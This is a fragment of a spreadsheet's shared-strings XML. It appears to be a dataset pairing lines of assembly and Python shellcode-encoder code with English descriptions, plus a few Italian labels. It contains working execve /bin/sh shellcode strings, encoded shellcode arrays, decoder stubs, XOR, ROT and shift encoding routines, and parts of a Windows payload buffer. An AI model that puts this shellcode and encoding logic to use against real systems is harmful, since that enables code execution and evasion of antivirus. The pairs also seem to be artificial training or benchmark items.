  </si>
  <si>
    <t>mov dl, byte [eax + 1]</t>
  </si>
  <si>
    <t>move the byte at address eax+1 to dl</t>
  </si>
  <si>
    <t>mov byte [eax], dl</t>
  </si>
  <si>
    <t>move dl at the address eax</t>
  </si>
  <si>
    <t>in call_shellcode execute the decoder routine</t>
  </si>
  <si>
    <t>add ebp,0x2</t>
  </si>
  <si>
    <t>add 0x2 to ebp</t>
  </si>
  <si>
    <t>jmp short decode_pr</t>
  </si>
  <si>
    <t>Goto the decode_pr to decode the next bytes</t>
  </si>
  <si>
    <t>jmp short Cycle</t>
  </si>
  <si>
    <t>jump short to Cycle</t>
  </si>
  <si>
    <t>encoder_shellcode: db 0x08,0x60,0x58,0xc8,0x39,0xb0,0xd8,0xc3,0x9f,0x9f,0xd1,0xb8,0xb3,0xfe,0xb9,0x1e,0x4e,0xfd,0x97,0x70,0x39,0xb0,0x6a,0xdb,0xb0,0xc4,0x09,0xcf,0x74,0x25,0x76,0xe6,0xe6,0xe6,0xf6,0x90,0x90,0xaa,0xaa</t>
  </si>
  <si>
    <t>encoder_shellcode is the array of bytes 0x08,0x60,0x58,0xc8,0x39,0xb0,0xd8,0xc3,0x9f,0x9f,0xd1,0xb8,0xb3,0xfe,0xb9,0x1e,0x4e,0xfd,0x97,0x70,0x39,0xb0,0x6a,0xdb,0xb0,0xc4,0x09,0xcf,0x74,0x25,0x76,0xe6,0xe6,0xe6,0xf6,0x90,0x90,0xaa,0xaa</t>
  </si>
  <si>
    <t>call_shellcode routine</t>
  </si>
  <si>
    <t>Next_Cycle:</t>
  </si>
  <si>
    <t>in Next_Cycle increment edi by one and jump short to formatting</t>
  </si>
  <si>
    <t>EncodedShellcode: db 0x43,0xed,0x1d,0xf4,0x40,0xfb,0x6f,0x7a,0xa9,0xe,0xb6,0xe,0xbc,0xc9,0xe3,0x7a,0xaf,0x7a,0x78,0xe,0xc5,0xda,0x76,0x6a,0x17,0x1a,0x4e,0x68,0x38,0xc2,0x99,0xfb,0x35,0x68,0x84,0xd2,0xb3,0xcb,0x7c,0x68,0x78,0xe2,0x9a,0xf5,0xe9,0x50,0xc0,0x24,0x91,0xf8,0xfe</t>
  </si>
  <si>
    <t>EncodedShellcode is the array of bytes 0x43,0xed,0x1d,0xf4,0x40,0xfb,0x6f,0x7a,0xa9,0xe,0xb6,0xe,0xbc,0xc9,0xe3,0x7a,0xaf,0x7a,0x78,0xe,0xc5,0xda,0x76,0x6a,0x17,0x1a,0x4e,0x68,0x38,0xc2,0x99,0xfb,0x35,0x68,0x84,0xd2,0xb3,0xcb,0x7c,0x68,0x78,0xe2,0x9a,0xf5,0xe9,0x50,0xc0,0x24,0x91,0xf8,0xfe</t>
  </si>
  <si>
    <t>jmp short formatting</t>
  </si>
  <si>
    <t>in call_shellcode call the decoder function</t>
  </si>
  <si>
    <t>encoded: db 0xAA,0x62,0xc0,0xAA,0xa0,0xAA,0xd0,0xAA,0x5e,0xAA,0x5e,0xAA,0xe6,0xAA,0xd0,0xAA,0xd0,0xAA,0x5e,0xAA,0xc4,0xAA,0xd2,0xAA,0xdc,0x89,0xe3,0xAA,0xa0,0x89,0xe2,0xAA,0xa6,0x89,0xe1,0xb0,0xAA,0x16,0xcd,0x80,0xBB</t>
  </si>
  <si>
    <t>encoded is the array of bytes 0xAA,0x62,0xc0,0xAA,0xa0,0xAA,0xd0,0xAA,0x5e,0xAA,0x5e,0xAA,0xe6,0xAA,0xd0,0xAA,0xd0,0xAA,0x5e,0xAA,0xc4,0xAA,0xd2,0xAA,0xdc,0x89,0xe3,0xAA,0xa0,0x89,0xe2,0xAA,0xa6,0x89,0xe1,0xb0,0xAA,0x16,0xcd,0x80,0xBB</t>
  </si>
  <si>
    <t>Legenda</t>
  </si>
  <si>
    <t>shellcode = "\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x89\xe2\x53\x89\xe1\xb0\x0b\xcd\x80"</t>
  </si>
  <si>
    <t>shellcode is a string "\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x89\xe2\x53\x89\xe1\xb0\x0b\xcd\x80"</t>
  </si>
  <si>
    <t>import random</t>
  </si>
  <si>
    <t>import module random</t>
  </si>
  <si>
    <t>shellcode = ("\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x89\xe2\x53\x89\xe1\xb0\x0b\xcd\x80")</t>
  </si>
  <si>
    <t>define shellcode as a tuple and add the string "\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x89\xe2\x53\x89\xe1\xb0\x0b\xcd\x80"</t>
  </si>
  <si>
    <t>import sys</t>
  </si>
  <si>
    <t>import module sys</t>
  </si>
  <si>
    <t>shellcode = ("\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x31"
    "\xc9\x89\xca\x6a\x0b\x58\xcd\x80")</t>
  </si>
  <si>
    <t>define shellcode as a tuple and add the string "\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x31\xc9\x89\xca\x6a\x0b\x58\xcd\x80"</t>
  </si>
  <si>
    <t>shellcode = ("\x31\xc0\x50\x68\x62\x61\x73\x68\x68\x62\x69\x6e\x2f\x68\x2f\x2f\x2f\x2f\x89\xe3\x50\x89\xe2\x53\x89\xe1\xb0\x0b\xcd\x80")</t>
  </si>
  <si>
    <t xml:space="preserve">declare the tuple shellcode containing the string "\x31\xc0\x50\x68\x62\x61\x73\x68\x68\x62\x69\x6e\x2f\x68\x2f\x2f\x2f\x2f\x89\xe3\x50\x89\xe2\x53\x89\xe1\xb0\x0b\xcd\x80" </t>
  </si>
  <si>
    <t>shellcode is a tuple containing the string  "\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x89\xe2\x53\x89\xe1\xb0\x0b\xcd\x80"</t>
  </si>
  <si>
    <t>import the package random</t>
  </si>
  <si>
    <t>import binascii</t>
  </si>
  <si>
    <t>import the package binascii</t>
  </si>
  <si>
    <t>buf = b""</t>
  </si>
  <si>
    <t>Declare an empty bytes literal and store it in the variable buf</t>
  </si>
  <si>
    <t>Declare a tuple called shellcode and add the string "\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x89\xe2\x53\x89\xe1\xb0\x0b\xcd\x80" into it</t>
  </si>
  <si>
    <t>shellcode = ("\x31\xc0\x50\x89\xe2\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\xb0\x0b\xcd\x80")</t>
  </si>
  <si>
    <t>Declare a tuple shellcode and add the string "\x31\xc0\x50\x89\xe2\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\xb0\x0b\xcd\x80" into it</t>
  </si>
  <si>
    <t>import random;</t>
  </si>
  <si>
    <t>Nessuna indentazione</t>
  </si>
  <si>
    <t>encoded = ""</t>
  </si>
  <si>
    <t>encoded is a string ""</t>
  </si>
  <si>
    <t>shellcode = ("\x31\xc0\x50\x68\x6e\x2f\x73\x68\x68\x2f\x2f\x62\x69\x89\xe3\x50\x89\xe2\x53\x89\xe1\xb0\x0b\xcd\x80")</t>
  </si>
  <si>
    <t>shellcode is a string "\x31\xc0\x50\x68\x6e\x2f\x73\x68\x68\x2f\x2f\x62\x69\x89\xe3\x50\x89\xe2\x53\x89\xe1\xb0\x0b\xcd\x80"</t>
  </si>
  <si>
    <t>encoded is string ""</t>
  </si>
  <si>
    <t>if len(sys.argv) != 3:</t>
  </si>
  <si>
    <t>if the length of sys.argv is different from 3</t>
  </si>
  <si>
    <t>W  = '\033[0m'</t>
  </si>
  <si>
    <t>W is a string '\033[0m'</t>
  </si>
  <si>
    <t>format_slash_x = ""</t>
  </si>
  <si>
    <t>format_slash_x is a string ""</t>
  </si>
  <si>
    <t>encoded = "\\x%02x," % len(bytearray(shellcode))</t>
  </si>
  <si>
    <t xml:space="preserve">encoded is the concatenation of the string "\\x", the hexadecimal value of the length of array of bytes of the variable shellcode and the string ',' </t>
  </si>
  <si>
    <t>encoded is an empty string</t>
  </si>
  <si>
    <t>encode = ""</t>
  </si>
  <si>
    <t>encode is an empty string</t>
  </si>
  <si>
    <t>import struct</t>
  </si>
  <si>
    <t>import the package struct</t>
  </si>
  <si>
    <t>execve_shellcode = bytearray(b"\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x87\xe3\xb0\x0b\xcd\x80")</t>
  </si>
  <si>
    <t>execve_shellcode is a bytearrary of the byte string "\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x87\xe3\xb0\x0b\xcd\x80"</t>
  </si>
  <si>
    <t>import socket</t>
  </si>
  <si>
    <t>import the package socket</t>
  </si>
  <si>
    <t>buf += b"\xfc\xe8\x82\x00\x00\x00\x60\x89\xe5\x31\xc0\x64\x8b"</t>
  </si>
  <si>
    <t>add the bytes literal "\xfc\xe8\x82\x00\x00\x00\x60\x89\xe5\x31\xc0\x64\x8b" to the variable buf</t>
  </si>
  <si>
    <t>initialize an empty string variable called encoded</t>
  </si>
  <si>
    <t>magic = 13</t>
  </si>
  <si>
    <t>set the variable magic to the value 13</t>
  </si>
  <si>
    <t>def mask(n):</t>
  </si>
  <si>
    <t>define a method named mask that takes in n as a parameter</t>
  </si>
  <si>
    <t>import the sys package</t>
  </si>
  <si>
    <t>I livello di indentazione</t>
  </si>
  <si>
    <t>encoded2 = ""</t>
  </si>
  <si>
    <t>encoded2 is a string ""</t>
  </si>
  <si>
    <t>encodedP2 = ""</t>
  </si>
  <si>
    <t>encodedP2 is string ""</t>
  </si>
  <si>
    <t>print "Usage : python encode.py &lt;SHIFT number&gt; &lt;XOR number&gt;"</t>
  </si>
  <si>
    <t>print string "Usage : python encode.py &lt;SHIFT number&gt; &lt;XOR number&gt;" to the standard output</t>
  </si>
  <si>
    <t>P  = '\033[35m'</t>
  </si>
  <si>
    <t>P is a string '\033[35m'</t>
  </si>
  <si>
    <t>format_0x = ""</t>
  </si>
  <si>
    <t>format_0x is a string ""</t>
  </si>
  <si>
    <t>encoded2 = "0x%02x," % len(bytearray(shellcode))</t>
  </si>
  <si>
    <t>encoded2 is the concatenation of the string "0x" with the hexadecimal conversion of the lenght of the array of bytes of shellcode</t>
  </si>
  <si>
    <t>encoded2 is an empty string</t>
  </si>
  <si>
    <t>for x in bytearray(shellcode) :</t>
  </si>
  <si>
    <t>iterate x over the array of bytes of the string shellcode</t>
  </si>
  <si>
    <t>import the package sys</t>
  </si>
  <si>
    <t>if (len(execve_shellcode)%2)!=0:</t>
  </si>
  <si>
    <t xml:space="preserve">check if the length of execve_shellcode is not even </t>
  </si>
  <si>
    <t>buf += b"\x50\x30\x8b\x52\x0c\x8b\x52\x14\x8b\x72\x28\x0f\xb7"</t>
  </si>
  <si>
    <t>add the bytes literal "\x50\x30\x8b\x52\x0c\x8b\x52\x14\x8b\x72\x28\x0f\xb7" to the variable buf</t>
  </si>
  <si>
    <t>initialize an empty string variable called encoded2</t>
  </si>
  <si>
    <t>encoded1 = ""</t>
  </si>
  <si>
    <t>initialize an empty string variable called encoded1</t>
  </si>
  <si>
    <t>if n &gt;= 0:</t>
  </si>
  <si>
    <t>check if n is greater or equals to 0</t>
  </si>
  <si>
    <t>shellcode =('\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x89\xe2\x53\x89\xe1\xb0\x0b\xcd\x80')</t>
  </si>
  <si>
    <t>Declare a tuple shellcode and add the string '\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x89\xe2\x53\x89\xe1\xb0\x0b\xcd\x80' into it</t>
  </si>
  <si>
    <t>II livello di indentazione</t>
  </si>
  <si>
    <t>rot = 8</t>
  </si>
  <si>
    <t>rot is an integer 8</t>
  </si>
  <si>
    <t>end = "\\xaa"</t>
  </si>
  <si>
    <t>end is a string "\\xaa"</t>
  </si>
  <si>
    <t>encoded2 is string ""</t>
  </si>
  <si>
    <t>print 'Encoded shellcode...'</t>
  </si>
  <si>
    <t>print string 'Encoded shellcode...' to the standard output</t>
  </si>
  <si>
    <t>sys.exit(0)</t>
  </si>
  <si>
    <t>call the exit function from sys with 0 as argument</t>
  </si>
  <si>
    <t>Y  = '\033[33m'</t>
  </si>
  <si>
    <t>Y is a '\033[33m'</t>
  </si>
  <si>
    <t>counter = 0</t>
  </si>
  <si>
    <t>counter is an integer 0</t>
  </si>
  <si>
    <t>print 'Encoded shellcode ...'</t>
  </si>
  <si>
    <t>if x &lt; 128:</t>
  </si>
  <si>
    <t>check if x is less then 128</t>
  </si>
  <si>
    <t>print</t>
  </si>
  <si>
    <t>print nothing</t>
  </si>
  <si>
    <t>execve_shellcode.append(0x90)</t>
  </si>
  <si>
    <t>append 0x90 to execve_shellcode</t>
  </si>
  <si>
    <t>buf += b"\x4a\x26\x31\xff\xac\x3c\x61\x7c\x02\x2c\x20\xc1\xcf"</t>
  </si>
  <si>
    <t>add the bytes literal "\x4a\x26\x31\xff\xac\x3c\x61\x7c\x02\x2c\x20\xc1\xcf" to the variable buf</t>
  </si>
  <si>
    <t>n = len(bytearray(shellcode))</t>
  </si>
  <si>
    <t>convert shellcode to a bytearray and store its length in the variable n</t>
  </si>
  <si>
    <t>return 2**n - 1</t>
  </si>
  <si>
    <t>return 2 to the power of n and subtract 1</t>
  </si>
  <si>
    <t>total = len(sys.argv)</t>
  </si>
  <si>
    <t>Set total to the number of command-line arguments</t>
  </si>
  <si>
    <t>III livello di indentazione</t>
  </si>
  <si>
    <t>print 'Encoded shellcode' to the standard output</t>
  </si>
  <si>
    <t>print 'Encoded shellcode ...' to the standard output</t>
  </si>
  <si>
    <t>encoded2P2 = ""</t>
  </si>
  <si>
    <t>encoded2P2 is string ""</t>
  </si>
  <si>
    <t>print 'Encoded shellcode...' to the standard output</t>
  </si>
  <si>
    <t>for x in bytearray(shellcode):</t>
  </si>
  <si>
    <t>loop through shellcode converted into a bytearray</t>
  </si>
  <si>
    <t>shift   = int(sys.argv[1])</t>
  </si>
  <si>
    <t>shift is the first element of sys.argv converted to integer</t>
  </si>
  <si>
    <t>ROT     = int(sys.argv[1])</t>
  </si>
  <si>
    <t>ROT is the first element of sys.argv converted to integer</t>
  </si>
  <si>
    <t>max_bits = 8</t>
  </si>
  <si>
    <t>max_bits is an integer 8</t>
  </si>
  <si>
    <t>loop x over the bytearray of the string shellcode</t>
  </si>
  <si>
    <t>x = x &lt;&lt; 1</t>
  </si>
  <si>
    <t>left shift x by 1</t>
  </si>
  <si>
    <t>decoder_stub =  '\x31\xc0\x31\xdb\x31\xc9\x31\xd2'</t>
  </si>
  <si>
    <t>decoder_stub is the string '\x31\xc0\x31\xdb\x31\xc9\x31\xd2'</t>
  </si>
  <si>
    <t>execve_shellcode = bytearray(execve_shellcode)</t>
  </si>
  <si>
    <t>execve_shellcode is a bytearrary of execve_shellcode</t>
  </si>
  <si>
    <t>decoder_stub = "\xeb\x57\x31\xc0\x31\xdb\x31\xc9"</t>
  </si>
  <si>
    <t>initialize the variable decoder_stub to "\xeb\x57\x31\xc0\x31\xdb\x31\xc9"</t>
  </si>
  <si>
    <t>buf += b"\x0d\x01\xc7\xe2\xf2\x52\x57\x8b\x52\x10\x8b\x4a\x3c"</t>
  </si>
  <si>
    <t>add the bytes literal "\x0d\x01\xc7\xe2\xf2\x52\x57\x8b\x52\x10\x8b\x4a\x3c" to the variable buf</t>
  </si>
  <si>
    <t>print 'Encoded shellcode …'</t>
  </si>
  <si>
    <t>output the string 'Encoded shellcode ...' to stdout</t>
  </si>
  <si>
    <t>for i in bytearray(shellcode):</t>
  </si>
  <si>
    <t>Make a for loop for each i in the bytearray of shellcode</t>
  </si>
  <si>
    <t>else:</t>
  </si>
  <si>
    <t>declare an else statement</t>
  </si>
  <si>
    <t>if total != 2:</t>
  </si>
  <si>
    <t>if total does not equal 2</t>
  </si>
  <si>
    <t>IV livello di indentazione</t>
  </si>
  <si>
    <t>count = 1</t>
  </si>
  <si>
    <t>count is integer 1</t>
  </si>
  <si>
    <t>y = x^0xAA</t>
  </si>
  <si>
    <t>y is x xor 0xAA</t>
  </si>
  <si>
    <t>y = ~x</t>
  </si>
  <si>
    <t>y is not x</t>
  </si>
  <si>
    <t>xor     = int(sys.argv[2])</t>
  </si>
  <si>
    <t>xor is the second element of sys.argv converted to integer</t>
  </si>
  <si>
    <t>nbits   = int(sys.argv[2])</t>
  </si>
  <si>
    <t>nbits is the second element of sys.argv converted to integer</t>
  </si>
  <si>
    <t>offset = 1</t>
  </si>
  <si>
    <t>offset is an integer 1</t>
  </si>
  <si>
    <t>if x &gt; 248:</t>
  </si>
  <si>
    <t>if x is greater than 248</t>
  </si>
  <si>
    <t>check if x is greater than 248</t>
  </si>
  <si>
    <t>encode += '0xAA,'</t>
  </si>
  <si>
    <t>append 0xAA to encode</t>
  </si>
  <si>
    <t>decoder_stub += '\xb2\x45\xeb\x1f\x5e\x8d\x3e\x8a'</t>
  </si>
  <si>
    <t>concatenate '\xb2\x45\xeb\x1f\x5e\x8d\x3e\x8a' to decoder_stub</t>
  </si>
  <si>
    <t>shellcode_len=len(execve_shellcode)</t>
  </si>
  <si>
    <t>save the length of execve_shellcode into shellcode_len</t>
  </si>
  <si>
    <t>decoder_stub += "\x31\xd2\x5e\xbf\x90\x90\xaa\xaa"</t>
  </si>
  <si>
    <t>add the string "\x31\xd2\x5e\xbf\x90\x90\xaa\xaa" to the variable decoder_stub</t>
  </si>
  <si>
    <t>buf += b"\x8b\x4c\x11\x78\xe3\x48\x01\xd1\x51\x8b\x59\x20\x01"</t>
  </si>
  <si>
    <t>add the bytes literal "\x8b\x4c\x11\x78\xe3\x48\x01\xd1\x51\x8b\x59\x20\x01" to the variable buf</t>
  </si>
  <si>
    <t>y = bytearray(shellcode)[0]^bytearray(shellcode)[1]</t>
  </si>
  <si>
    <t>compute bitwise xor of the first element in shellcode converted into a bytearray and the second element of shellcode converted into a byte array</t>
  </si>
  <si>
    <t>j = (i + magic)%256</t>
  </si>
  <si>
    <t>Store in the variable j the sum of i and magic modulus 256</t>
  </si>
  <si>
    <t>return 0</t>
  </si>
  <si>
    <t>return the value of 0</t>
  </si>
  <si>
    <t>print '!!Give the LEADER byte'</t>
  </si>
  <si>
    <t>output the string '!!Give the LEADER byte'</t>
  </si>
  <si>
    <t>V livello di indentazione</t>
  </si>
  <si>
    <t>if x is less than 128</t>
  </si>
  <si>
    <t>print string 'Encoded shellcode ...' to the standard output</t>
  </si>
  <si>
    <t>encoded += '\\x'</t>
  </si>
  <si>
    <t>append string '\\x' to encoded</t>
  </si>
  <si>
    <t xml:space="preserve">append string '\\x' to encoded </t>
  </si>
  <si>
    <t>XOR     = int(sys.argv[3])</t>
  </si>
  <si>
    <t>XOR is the third element of sys.argv converted to integer</t>
  </si>
  <si>
    <t>val1 = 2**max_bits-1</t>
  </si>
  <si>
    <t>subtract 1 from 2 raised to max_bits and assign the result to val1</t>
  </si>
  <si>
    <t>append '\\x' to encoded</t>
  </si>
  <si>
    <t>encode += '0x'</t>
  </si>
  <si>
    <t>append 0x to encode</t>
  </si>
  <si>
    <t>decoder_stub += '\x1c\x0f\x88\xdf\x88\xd0\x30\xd8'</t>
  </si>
  <si>
    <t>concatenate the string '\x1c\x0f\x88\xdf\x88\xd0\x30\xd8' to decoder_stub</t>
  </si>
  <si>
    <t>print("[&gt;] Shellcode Length: {}".format(shellcode_len))</t>
  </si>
  <si>
    <t>print "Shellcode Length:" and the value of shellcode_len</t>
  </si>
  <si>
    <t>decoder_stub += "\x83\xec\x7f\x83\xec\x7f\x83\xec"</t>
  </si>
  <si>
    <t>add the string "\x83\xec\x7f\x83\xec\x7f\x83\xec" to the variable decoder_stub</t>
  </si>
  <si>
    <t>buf += b"\xd3\x8b\x49\x18\xe3\x3a\x49\x8b\x34\x8b\x01\xd6\x31"</t>
  </si>
  <si>
    <t>add the bytes literal "\xd3\x8b\x49\x18\xe3\x3a\x49\x8b\x34\x8b\x01\xd6\x31" to the variable buf</t>
  </si>
  <si>
    <t>add the string value '\\x' to the variable encoded</t>
  </si>
  <si>
    <t>encoded1 += '\\x'</t>
  </si>
  <si>
    <t>add the string value '\\x' to the variable encoded1</t>
  </si>
  <si>
    <t>def rol(n, rotations, width=8):</t>
  </si>
  <si>
    <t>define a method named rol with the parameters n, rotations, and width. Width has a default value of 8</t>
  </si>
  <si>
    <t>print 'Script must run as: python xxx.py LEADER'</t>
  </si>
  <si>
    <r>
      <t xml:space="preserve">output the string 'Script must run as: python </t>
    </r>
    <r>
      <rPr>
        <u/>
        <sz val="10"/>
        <color rgb="FF1155CC"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>xxx.py</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color rgb="FF000000"/>
        <rFont val="Arial"/>
      </rPr>
      <t xml:space="preserve"> LEADER'</t>
    </r>
  </si>
  <si>
    <t>h  = (y + rot)%256</t>
  </si>
  <si>
    <t>h is the sum of y and rot modulo 256</t>
  </si>
  <si>
    <t>x = x^0xDD</t>
  </si>
  <si>
    <t>x is x xor 0xDD</t>
  </si>
  <si>
    <t>encoded += '%02x' % x</t>
  </si>
  <si>
    <t>append the value x converted in hex to the string encoded</t>
  </si>
  <si>
    <t>encoded += '%02x' % y</t>
  </si>
  <si>
    <t>append the value y converted in hex to the string encoded</t>
  </si>
  <si>
    <t>encoded += '%02x' % (y &amp; 0xff)</t>
  </si>
  <si>
    <t>perform the and operation between y and 0xff, then convert the result in hexadecimal and append it to the string encoded</t>
  </si>
  <si>
    <t>encoded_shellcode = ""</t>
  </si>
  <si>
    <t>encoded_shellcode is a string ""</t>
  </si>
  <si>
    <t>shellcode = ("\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x87\xdc\xb0\x0b\xcd\x80")</t>
  </si>
  <si>
    <t>shellcode is a string "\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x87\xdc\xb0\x0b\xcd\x80"</t>
  </si>
  <si>
    <t>val2 = r_bits % max_bits</t>
  </si>
  <si>
    <t>val2 is rbits modulo max_bits</t>
  </si>
  <si>
    <t>encoded += '%02x' %(7 -(256 - x))</t>
  </si>
  <si>
    <t>append to the string encoded the value (7 - (256 -x)) converted to hexadecimal</t>
  </si>
  <si>
    <t>encode += '%02x,'%x</t>
  </si>
  <si>
    <t>convert the value x in hexadecimal and append it to the string encode followed by ','</t>
  </si>
  <si>
    <t>decoder_stub += '\x74\x16\x66\x8b\x44\x0f\x01\x66'</t>
  </si>
  <si>
    <t>append the string '\x74\x16\x66\x8b\x44\x0f\x01\x66' to decoder_stub</t>
  </si>
  <si>
    <t>orig = []</t>
  </si>
  <si>
    <t>orig is an empty list</t>
  </si>
  <si>
    <t>decoder_stub += "\x7f\x83\xec\x7f\x8a\x5c\x16\x01"</t>
  </si>
  <si>
    <t>add the string "\x7f\x83\xec\x7f\x8a\x5c\x16\x01" to the variable decoder_stub</t>
  </si>
  <si>
    <t>buf += b"\xff\xac\xc1\xcf\x0d\x01\xc7\x38\xe0\x75\xf6\x03\x7d"</t>
  </si>
  <si>
    <t>add the bytes literal "\xff\xac\xc1\xcf\x0d\x01\xc7\x38\xe0\x75\xf6\x03\x7d" to the variable buf</t>
  </si>
  <si>
    <t>Convert the value of y to a hexadecimal then added it to the variable encoded2</t>
  </si>
  <si>
    <t>encoded1 += '%02x' %j</t>
  </si>
  <si>
    <t>Convert the value of j to a hexadecimal then add it to the variable encoded1</t>
  </si>
  <si>
    <t>rotations %= width</t>
  </si>
  <si>
    <t>store in the variable rotations the modulus of rotations and width</t>
  </si>
  <si>
    <t>print 'LEADER is any integer between 17-255'</t>
  </si>
  <si>
    <t>display 'LEADER is any integer between 17-255'</t>
  </si>
  <si>
    <t>encoded += '\\xbb'</t>
  </si>
  <si>
    <t>append string '\\xbb' to encoded</t>
  </si>
  <si>
    <t>x += 1</t>
  </si>
  <si>
    <t>increment x by 1</t>
  </si>
  <si>
    <t>encoded += '\\x%02x' % 0xAA</t>
  </si>
  <si>
    <t>append string '\\x' followed by the conversion in hex of 0xAA to the string encoded</t>
  </si>
  <si>
    <t>encoded2 += '0x'</t>
  </si>
  <si>
    <t xml:space="preserve">append string '0x' to encoded2 </t>
  </si>
  <si>
    <t>append string '0x' to encoded2</t>
  </si>
  <si>
    <t>encoded_shellcode += '0x'</t>
  </si>
  <si>
    <t>append string '0x' to encoded_shellcode</t>
  </si>
  <si>
    <t>XOR_HEX = hex(XOR)</t>
  </si>
  <si>
    <t>XOR_HEX is XOR converted to hexadecimal</t>
  </si>
  <si>
    <t>print "Shellcode encryption started ..."</t>
  </si>
  <si>
    <t>print string "Shellcode encryption started..." to the standard output</t>
  </si>
  <si>
    <t>append '0x' to encoded2</t>
  </si>
  <si>
    <t>print encode</t>
  </si>
  <si>
    <t>decoder_stub += '\x31\xd8\x66\x89\x07\x41\x8d\x7f'</t>
  </si>
  <si>
    <t>append '\x31\xd8\x66\x89\x07\x41\x8d\x7f' to decoder_stub</t>
  </si>
  <si>
    <t>swapped = []</t>
  </si>
  <si>
    <t>swapped is an empty list</t>
  </si>
  <si>
    <t>decoder_stub += "\x8a\x7c\x16\x02\x8a\x4c\x16\x03"</t>
  </si>
  <si>
    <t>add the string "\x8a\x7c\x16\x02\x8a\x4c\x16\x03" to the variable decoder_stub</t>
  </si>
  <si>
    <t>buf += b"\xf8\x3b\x7d\x24\x75\xe4\x58\x8b\x58\x24\x01\xd3\x66"</t>
  </si>
  <si>
    <t>add the bytes literal "\xf8\x3b\x7d\x24\x75\xe4\x58\x8b\x58\x24\x01\xd3\x66" to the variable buf</t>
  </si>
  <si>
    <t>add the string value '0x' to the variable encoded2</t>
  </si>
  <si>
    <t>if rotations &lt; 1:</t>
  </si>
  <si>
    <t>check if rotations is less than the value of 1</t>
  </si>
  <si>
    <t>print 'e.g  python Followtheleader.py 32'</t>
  </si>
  <si>
    <r>
      <t xml:space="preserve">display 'e.g python </t>
    </r>
    <r>
      <rPr>
        <u/>
        <sz val="10"/>
        <color rgb="FF1155CC"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>Followtheleader.py</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color rgb="FF000000"/>
        <rFont val="Arial"/>
      </rPr>
      <t xml:space="preserve"> 32'</t>
    </r>
  </si>
  <si>
    <t>encoded += '%02x' % (h &amp; 0xff)</t>
  </si>
  <si>
    <t>append to the string encoded the hexadecimal conversion of the and operation between h and 0xff</t>
  </si>
  <si>
    <t>if count % 2 != 0:</t>
  </si>
  <si>
    <t>if count modulo 2 is different from zero</t>
  </si>
  <si>
    <t>encoded2 += '%02x,' % y</t>
  </si>
  <si>
    <t>Convert the variable y to a hexadecimal. Concatenate the result with the string '
add the result to the variable encoded2"</t>
  </si>
  <si>
    <t>encoded2 += '%02x,' % (y &amp; 0xff)</t>
  </si>
  <si>
    <t>Convert the value of y bitwise and 0xff to a hexadecimal then added it to the variable encoded2 followed by the string ','</t>
  </si>
  <si>
    <t>encoded_shellcode += '%02x, ' %shift</t>
  </si>
  <si>
    <t>convert shift to hexadecimal and append it followed by ', ' to the string encoded_shellcode</t>
  </si>
  <si>
    <t>encoded_shellcode  = ""</t>
  </si>
  <si>
    <t>encoded2 += '%02x,' %(7 -(256 - x))</t>
  </si>
  <si>
    <t>convert (7 -(256 - x)) to hexadecimal, concatenate the result with the string ',' and append it to the string encoded2</t>
  </si>
  <si>
    <t>decoder_stub += '\x02\xeb\xe4\xe8\xdc\xff\xff\xff'</t>
  </si>
  <si>
    <t>append '\x02\xeb\xe4\xe8\xdc\xff\xff\xff' to decoder_stub</t>
  </si>
  <si>
    <t>x = 0</t>
  </si>
  <si>
    <t>x is 0</t>
  </si>
  <si>
    <t>decoder_stub += "\x8a\x6c\x16\x04\x32\x1c\x16\x32"</t>
  </si>
  <si>
    <t>add the string "\x8a\x6c\x16\x04\x32\x1c\x16\x32" to the variable decoder_stub</t>
  </si>
  <si>
    <t>buf += b"\x8b\x0c\x4b\x8b\x58\x1c\x01\xd3\x8b\x04\x8b\x01\xd0"</t>
  </si>
  <si>
    <t>add the bytes literal "\x8b\x0c\x4b\x8b\x58\x1c\x01\xd3\x8b\x04\x8b\x01\xd0" to the variable buf</t>
  </si>
  <si>
    <t>encoded2 += '%02x,' %y</t>
  </si>
  <si>
    <t>Convert the value of y to a hexadecimal, concatenate the result with the string ',' and then add it to the variable encoded2</t>
  </si>
  <si>
    <t>encoded2 += '%02x, ' %j</t>
  </si>
  <si>
    <t>Convert the value of j to a hexadecimal then add it to the variable encoded2 followed by the string ', '</t>
  </si>
  <si>
    <t>return n</t>
  </si>
  <si>
    <t>return the value of n</t>
  </si>
  <si>
    <t>else</t>
  </si>
  <si>
    <t>encoded2 += '%02x,' % x</t>
  </si>
  <si>
    <t>Convert the value of x to a hexadecimal then add it to the variable encoded2 followed by the string ', '</t>
  </si>
  <si>
    <t>print encoded +"\n"</t>
  </si>
  <si>
    <t>append string "\n" to encoded, print it to the standard output</t>
  </si>
  <si>
    <t>original_shellcode = ""</t>
  </si>
  <si>
    <t>original_shellcode is a string ""</t>
  </si>
  <si>
    <t>counter += 1</t>
  </si>
  <si>
    <t>increase counter by 1</t>
  </si>
  <si>
